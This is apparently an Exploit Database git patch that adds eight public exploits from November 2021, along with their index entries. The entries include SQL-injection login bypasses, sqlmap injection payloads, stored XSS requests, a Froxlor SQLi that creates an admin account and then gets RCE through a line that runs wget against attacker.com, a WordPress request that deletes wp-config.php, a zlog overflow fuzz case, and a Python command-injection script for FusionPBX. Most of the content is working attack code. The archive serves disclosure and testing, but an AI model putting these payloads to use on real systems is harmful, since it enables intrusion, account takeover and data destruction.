From d8eefee2c74abbe4aca8cb94cd22045e31b391b7 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 Nov 2021 05:02:09 +0000 Subject: [PATCH] DB: 2021-11-09 8 changes to exploits/shellcodes zlog 1.2.15 - Buffer Overflow Simple Client Management System 1.0 - SQLi (Authentication Bypass) Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) Money Transfer Management System 1.0 - Authentication Bypass Froxlor 0.10.29.1 - SQL Injection (Authenticated) WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated) --- exploits/multiple/local/50504.c | 48 ++++++++++ exploits/php/webapps/50497.txt | 48 ++++++++++ exploits/php/webapps/50498.txt | 163 ++++++++++++++++++++++++++++++++ exploits/php/webapps/50499.txt | 37 ++++++++ exploits/php/webapps/50501.txt | 28 ++++++ exploits/php/webapps/50502.txt | 91 ++++++++++++++++++ exploits/php/webapps/50503.txt | 57 +++++++++++ exploits/php/webapps/50505.py | 56 +++++++++++ files_exploits.csv | 8 ++ 9 files changed, 536 insertions(+) create mode 100644 exploits/multiple/local/50504.c create mode 100644 exploits/php/webapps/50497.txt create mode 100644 exploits/php/webapps/50498.txt create mode 100644 exploits/php/webapps/50499.txt create mode 100644 exploits/php/webapps/50501.txt create mode 100644 exploits/php/webapps/50502.txt create mode 100644 exploits/php/webapps/50503.txt create mode 100755 exploits/php/webapps/50505.py diff --git a/exploits/multiple/local/50504.c b/exploits/multiple/local/50504.c new file mode 100644 index 000000000..26ead6856 --- /dev/null +++ b/exploits/multiple/local/50504.c @@ -0,0 +1,48 @@ +# Exploit Title: zlog 1.2.15 - Buffer Overflow +# Date: 10/23/2021 +# Exploit Author: LIWEI +# Vendor Homepage: https://github.com/HardySimpson/zlog +# Software Link: https://github.com/HardySimpson/zlog +# Version: v1.2.15 +# Tested on: ubuntu 18.04.2 +# 1.- compile the zlogv1.2.15 code to a library. +# 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below. +# 3.- crash. because it made a stack-buffer-overflow READ. +# 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20". +# 5.- Here are the crash backtrace. +#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15 +#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7 +#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18 +#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6 +#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18 + +And also my testcase: +#include +#include +#include +#include "zlog.h" + +int +LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) +{ + char filename[256]; + sprintf(filename, "/tmp/libfuzzer.%d", getpid()); + + FILE *fp = fopen(filename, "wb"); + if (!fp) + return 0; + fwrite(data, size, 1, fp); + fclose(fp); + + int rc = zlog_init(filename); + if (rc == 0) + { + zlog_fini(); + } + unlink(filename); + remove(filename); + return 0; +} + +Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++" +Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it. \ No newline at end of file diff --git a/exploits/php/webapps/50497.txt b/exploits/php/webapps/50497.txt new file mode 100644 index 000000000..3275784b2 --- /dev/null +++ b/exploits/php/webapps/50497.txt @@ -0,0 +1,48 @@ +# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass) +# Exploit Author: Sentinal920 +# Date: 5-11-2021 +# Category: Web application +# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip +# Version: 1.0 +# Tested on: Kali Linux +# Vulnerable page: Login +# Vulnerable Parameter: "password" + + +Technical description: +An SQL Injection vulnerability exists in the Simple Client Management +System. An attacker can leverage the vulnerable "password" parameter +in the "Login.php" web page to authenticate as an admin user. + +Steps to exploit: +1) Navigate to http://localhost/cms/admin/login.php +2) Set username as admin and insert your payload in the password parameter + +Proof of concept (Poc): +The following payload inside password will allow you to login into the +web server as admin +admin'or'1'%3D'1 + +--- + +POST /cms/classes/Login.php?f=login HTTP/1.1 +Host: localhost +Content-Length: 51 +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/cms/admin/login.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn +Connection: close + +username=admin'or'1'%3D'1&password=admin'or'1'%3D'1 + +--- \ No newline at end of file diff --git a/exploits/php/webapps/50498.txt b/exploits/php/webapps/50498.txt new file mode 100644 index 000000000..c1bdb78d7 --- /dev/null +++ b/exploits/php/webapps/50498.txt @@ -0,0 +1,163 @@ +# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) +# Exploit Author: Sentinal920 +# Date: 5-11-2021 +# Category: Web application +# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip +# Version: 1.0 +# Tested on: Kali Linux +# Vulnerable page: client,invoice +# Vulnerable Parameters: "lastname", "remarks" + +Technical description: +A stored XSS vulnerability exists in the Simple Client Management +System. An attacker can leverage this vulnerability in order to run +javascript on the web server surfers behalf, which can lead to cookie +stealing, defacement and more. + +Steps to exploit: +1) Navigate to http://localhost/cms/admin/?page=client +2) Click on add new client +3) Insert your payload in the "lastname" parameter or the "description" parameter +4) Click save + +Proof of concept (Poc): +The following payload will allow you to run the javascript - + + + + +1) XSS POC in Add New Client +----------------------------- + +POST /cms/classes/Master.php?f=save_client HTTP/1.1 +Host: localhost +Content-Length: 1026 +sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 +Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/cms/admin/?page=client/manage_client +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn +Connection: close + + +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="lastname" + + +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="firstname" + +anything +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="middlename" + +anything +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="gender" + +Male +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="dob" + +2021-11-03 +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="contact" + +xxxxxxxxxx +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="address" + +xxxxxx +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="email" +xxxx@xxx.com +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="avatar"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- + + + +2) XSS POC in Add New Invoice +----------------------------- + +POST /cms/classes/Master.php?f=save_invoice HTTP/1.1 +Host: localhost +Content-Length: 1032 +sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 +Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/cms/admin/?page=invoice/manage_invoice +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn +Connection: close + +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="id" + + +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="client_id" + +1 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="service_id[]" + +1 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="price[]" + +250 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="discount_perc" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="discount" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="tax_perc" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="tax" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="total_amount" + +250 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="remarks" + + +------WebKitFormBoundaryEk0iOWhhoA0lApXo-- \ No newline at end of file diff --git a/exploits/php/webapps/50499.txt b/exploits/php/webapps/50499.txt new file mode 100644 index 000000000..c7d2d6b93 --- /dev/null +++ b/exploits/php/webapps/50499.txt @@ -0,0 +1,37 @@ +# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) +# Google Dork: intitle: "Inicio de Sesión - Kmaleon" +# Date: 2021-11-05 +# Exploit Author: Amel BOUZIANE-LEBLOND +# Vendor Homepage: https://www.levelprograms.com +# Software Link: https://www.levelprograms.com/kmaleon-abogados/ +# Version: v1.1.0.205 +# Tested on: Linux + +# Description: +# The Kmaleon application from levelprogram is vulnerable to +# SQL injection via the 'tipocomb' parameter on the kmaleonW.php + +==================== 1. SQLi ==================== + +http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true + +The 'tipocomb' parameter is vulnerable to SQL injection. + +GET parameter 'tipocomb' is vulnerable. + +--- +Parameter: #1* (URI) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true + + Type: time-based blind + Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) + Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.0 \ No newline at end of file diff --git a/exploits/php/webapps/50501.txt b/exploits/php/webapps/50501.txt new file mode 100644 index 000000000..22859ba58 --- /dev/null +++ b/exploits/php/webapps/50501.txt @@ -0,0 +1,28 @@ +# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass +# Date: 2021-11-07 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html +# Version: 1.0 +# Tested on: Windows 10 +# Admin panel authentication bypass + +Admin panel authentication can be bypassed due to a SQL injection in the login form: + +Request: +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://localhost/mtms/admin/login.php +Content-Length: 37 +Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3 +Connection: keep-alive + +username='=''or'&password='=''or' + +PoC: +curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php \ No newline at end of file diff --git a/exploits/php/webapps/50502.txt b/exploits/php/webapps/50502.txt new file mode 100644 index 000000000..c986d5c93 --- /dev/null +++ b/exploits/php/webapps/50502.txt @@ -0,0 +1,91 @@ +# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +# Exploit Author: Martin Cernac +# Date: 2021-11-05 +# Vendor: Froxlor (https://froxlor.org/) +# Software Link: https://froxlor.org/download.php +# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +# Patched Version: 0.10.30 +# Category: Web Application +# Tested on: Ubuntu +# CVE: 2021-42325 + +# 1. Technical Description: +# +# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +# +# 1.1 Pre-requisites +# - Access to a customer account +# - Ability to specify database name when creating a database +# - Feature only availible from 0.10.28 onward and must be manually enabled + + +# 2. Proof Of Concept (PoC): +# +# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +# 2.1 Privilege Escalation +# +# - Sign into Froxlor as a customer +# - View your databases +# - Create a database +# - Put your payload into the "User/Database name" field (if enabled) +# - Application will error out however your SQL query will be executed +# +# The following is a POST request example of running the payload provided, resulting in an administrator account being created +--- +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 + +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 +--- +# +# 2.2 Remote Code Execution +# +# To achieve RCE as root: +# +# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) +# - Go to System Settings +# - Go to Webserver settings +# - Adjust "Webserver reload command" field to a custom command +# - The command must not contain any of the following special characters: ;|&><`$~? +# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php +# - For example commands see Payloads 4.2 section +# - Trigger configuration file rebuild +# - Use menu item "Rebuild config files" +# - Await a root cron job to execute your command + + +# 3. Vulnerable resources and parameters +# /customer_mysql.php (POST field: custom_suffix) + + +# 4. Payloads +# +# 4.1 SQL Injection payload +# The following payload creates a new Froxlor admin with full access to all customers and the server configuration +# The credentials are: +# - username: x +# - password: a +# +# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- +# +# +# 4.2 Remote Code Execution payload +# Two part payload: +# - wget http://attacker.com/malicious.txt -O /runme.php +# - php /runme.php + + +# 5. Timeline +# 2021-10-11 Discovery +# 2021-10-11 Contact with developer +# 2021-10-11 Patch issued but no release rolled out +# 2021-10-12 Reserved CVE-2021-42325 +# 2021-11-05 Fix release rolled out +# 2021-11-07 Public disclosure + + +# 6. References: +# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file diff --git a/exploits/php/webapps/50503.txt b/exploits/php/webapps/50503.txt new file mode 100644 index 000000000..41d42a598 --- /dev/null +++ b/exploits/php/webapps/50503.txt @@ -0,0 +1,57 @@ +# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion +# Date: 11/07/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: https://www.miniorange.com/ +# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/ +# Version: 1.0.3 +# Tested on : Windows 10 + +#Poc: + +----------------------------------REQUEST--------------------------------------- + +POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 155 +Origin: http://localhost +Connection: close +Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce + + +---------------------------------------------------------------------------------- + + + +-------------------------------RESPONSE------------------------------------------- + +HTTP/1.1 200 OK +Date: Sun, 07 Nov 2021 13:19:38 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 +X-Powered-By: PHP/8.0.7 +Access-Control-Allow-Origin: http://localhost +Access-Control-Allow-Credentials: true +X-Robots-Tag: noindex +X-Content-Type-Options: nosniff +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +X-Frame-Options: SAMEORIGIN +Referrer-Policy: strict-origin-when-cross-origin +Content-Length: 9 +Connection: close +Content-Type: application/json; charset=UTF-8 + +"success" + +---------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/50505.py b/exploits/php/webapps/50505.py new file mode 100755 index 000000000..d5cf04f13 --- /dev/null +++ b/exploits/php/webapps/50505.py @@ -0,0 +1,56 @@ +# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated) +# Date: 11/08/2021 +# Exploit Author: Luska +# Vendor Homepage: https://www.fusionpbx.com/ +# Software Link: https://github.com/fusionpbx/fusionpbx +# Version: < 4.5.30 +# Tested on: Debian +# CVE : CVE-2021-43405 + +#!/usr/bin/python3 +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder +import argparse + + +cookies = {'PHPSESSID': '31337'} +proxy = {'http': 'http://127.0.0.1:8080'} + +def login(url, username, password): + data = { + 'username': username, + 'password': password + } + r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies) + return r.status_code + +def exploit_request(url, cmd): + print('[+] Sending Exploit Request') + mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send' }) + r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies, headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxy) + return r.status_code + +def exploit(url, username, password, cmd): + if login(url,username,password) == 200: + print('[+] Login Successful') + exploit_request(url, cmd) + print('[+] Exploit Sucessful') + else: + print('[-] Login Failed') + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405') + + parser.add_argument('-t', metavar='', help='Target/host URL, example: http://127.0.0.1', required=True) + parser.add_argument('-u', metavar='', help='User to login', required=True) + parser.add_argument('-p', metavar='', help='User\'s password', required=True) + parser.add_argument('-c', metavar='', help='Command to be executed', required=True) + + args = parser.parse_args() + + target = args.t + user = args.u + password = args.p + cmd = args.c + + exploit(target, user, password, cmd) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d67a24b40..97d44682e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11412,6 +11412,7 @@ id,file,description,date,author,type,platform,port 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows, 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows, 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, +50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44596,3 +44597,10 @@ id,file,description,date,author,type,platform,port 50493,exploits/php/webapps/50493.py,"Opencart 3 Extension TMD Vendor System - Blind SQL Injection",1970-01-01,"Muhammad Zaki Sulistya",webapps,php, 50495,exploits/php/webapps/50495.txt,"Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php, 50496,exploits/multiple/webapps/50496.txt,"ImportExportTools NG 10.0.4 - HTML Injection",1970-01-01,Vulnerability-Lab,webapps,multiple, +50497,exploits/php/webapps/50497.txt,"Simple Client Management System 1.0 - SQLi (Authentication Bypass)",1970-01-01,Sentinal920,webapps,php, +50498,exploits/php/webapps/50498.txt,"Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Sentinal920,webapps,php, +50499,exploits/php/webapps/50499.txt,"Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)",1970-01-01,"Amel BOUZIANE-LEBLOND",webapps,php, +50501,exploits/php/webapps/50501.txt,"Money Transfer Management System 1.0 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,php, +50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php, +50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php, +50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,